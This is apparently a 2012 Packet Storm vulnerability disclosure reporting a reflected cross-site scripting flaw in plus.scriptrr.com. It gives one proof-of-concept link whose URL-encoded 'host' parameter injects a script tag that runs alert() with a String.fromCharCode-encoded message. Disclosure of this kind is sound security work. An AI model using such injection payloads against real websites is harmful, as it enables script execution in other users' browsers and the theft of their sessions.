Plus.scriptrr.com Cross Site Scripting

2012-02-26T00:00:00
ID PACKETSTORM:110208
Type packetstorm
Reporter Girish Shrimali
Modified 2012-02-26T00:00:00

Description

                                        
                                            `>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
  
  
WhiteHatZone  
  
  
  
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<  
  
# Exploit Title: XSS vulnerability in plus.scriptrr.com  
# Date: 25/02/2012  
  
# Author: Girish Shrimali  
  
# Website: http://whitehatzone.blogspot.com  
  
# Tested On: Win7  
  
# Email: gjshrimali@gmail.com  
  
# Google Dork : plus.scriptrr.com  
##############################################################################################################  
  
  
  
>>> Vulnerable Website: http://plus.scriptrr.com/  
  
>>> VUlnerable Link: http://plus.scriptrr.com/selfhosted.html?id=100825987461531739433&host=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888,%2083,%2083,%2032,%20102,%20111,%20117,%20110,%20100,%2032,%2098,%20121,%2032,%2071,%20105,%20114,%20105,%20115,%20104,%2032,%2083,%20104,%20114,%20105,%20109,%2097,%20108,%20105%29%29;%3C/script%3E&width=200&links=0&color=343434   
  
  
##############################################################################################################  
`